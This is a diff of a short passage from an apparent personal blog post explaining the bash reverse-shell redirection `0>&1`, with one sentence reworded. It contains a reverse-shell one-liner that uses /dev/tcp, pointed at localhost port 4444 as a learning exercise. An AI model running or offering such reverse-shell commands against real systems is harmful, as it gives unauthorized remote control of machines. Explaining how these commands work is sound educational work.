sainaen/hypothetical.me/content/post/2018-01-10_reverse_shell_in_bash.md

 That’s exactly how `0>&1` reads to me.
 What does it even mean?!

 At first, I thought this is needed so that the server, i.e. netcat side, would see its input back.
 I’ve tested my idea by removing it from the command.
-That broke the ‘shell’ part of the reverse shell: now I could see commands and their output on the server, but couldn’t execute anything!
+That broke the ‘shell’ part: now I could still see commands and their output on the server side, but couldn’t execute anything!
 You should play with it; it’s kind of a weird setup:
 ```
 $ bash -i >& /dev/tcp/127.0.0.1/4444
 ```